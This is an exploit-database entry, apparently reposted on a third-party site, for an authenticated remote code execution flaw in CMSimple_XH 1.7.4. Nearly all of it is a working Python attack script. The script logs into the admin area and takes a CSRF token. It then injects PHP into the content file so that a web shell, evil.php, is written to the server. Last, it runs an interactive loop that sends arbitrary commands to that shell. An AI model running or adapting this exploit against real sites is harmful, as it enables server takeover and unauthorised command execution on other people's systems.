CMSimple_XH 1.7.4 Exploit, Remote Code Execution (RCE) (Authenticated)

# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
# Date: 01-10-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://www.cmsimple-xh.org/
# Software Link: https://www.cmsimple-xh.org/?Downloads
# Version: 1.7.4
# Category: Webapps
# Tested on: Linux/Windows


# CMSimple_XH is an open source project under GPL3 license
# Includes an endpoint that allows remote access
# Backup page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.

# Example: python3 exploit.py -u http://example.com -p Admin123



from bs4 import BeautifulSoup
from time import sleep
import requests
import argparse


def main():
parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
parser.add_argument('-u', '--host', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
args = parser.parse_args()
print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
host(args)



def host(args):
#Check http or https
if args.host.startswith(('http://', 'https://')):
print("[?] Check Url...\n")
sleep(2)
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass
else:
print("\n[?] Check Adress...\n")
sleep(2)
args.host = "http://" + args.host
args.host = args.host
if args.host.endswith('/'):
args.host = args.host[:-1]
else:
pass


# Check Host Status
try:
response = requests.get(args.host)
if response.status_code == 200:
login(args)
else:
print("[-] Address not reachable!")
sleep(2)

except requests.ConnectionError as exception:
print("[-] Address not reachable!")
sleep(2)
exit(1)


def login(args):

url = args.host + "/?&login"
cookies = {
"XH_2f": "evil"
}
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?&login"
}
data = {
"login": "true",
"keycut": args.password,
"submit": "Login"
}
response = requests.post(url, headers=headers, cookies=cookies, data=data)

token = response.cookies.get("XH_2f")
soup = BeautifulSoup(response.text, 'html.parser')

if (soup.find("link",{"rel":"next"})['href'] != "/"):
print("[!] Login Success!\n")
sleep(2)
csrf(args,token)
else:
print("[!] Wrong password!!\n")
sleep(2)


def csrf(args, token):

url = args.host + "/?file=content"
cookies = {
"status": "adm",
"XH_2f": token
}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?&settings",
"Accept-Encoding": "gzip, deflate",
"Connection": "close"
}
response = requests.get(url, headers=headers, cookies=cookies)

try:
soup = BeautifulSoup(response.text, 'html.parser')
csrf = soup.find_all("input", type="hidden")[3].get("value")
create(args, token, csrf)
except Exception as e:
print(e)
else:
pass



def create(args, token, csrf):

payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"

url = args.host
cookies = {
"status": "adm",
"XH_2f": token
}
headers = {
"Origin": args.host,
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": args.host + "/?file=content&action=edit&xh_success=content",
"Accept-Encoding": "gzip, deflate"
}
data = {
"text": payload,
"file": "content",
"action": "save",
"xh_csrf_token": csrf
}
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)

if (response.status_code == 200):
print("[!] Create Vuln File!\n")
sleep(2)
exploit(args)
else:
print("[!] Create Failed!\n")
sleep(2)


def exploit(args):

print("[+] Exploit Done!\n")
sleep(2)

while True:
cmd = input("$ ")
url = args.host + "/evil.php?cmd=" + cmd
headers = {
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
}

response = requests.post(url, headers=headers, timeout=5)

if response.text == "":
print(cmd + ": command not found\n")
else:
print(response.text)



if __name__ == '__main__':
main()

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD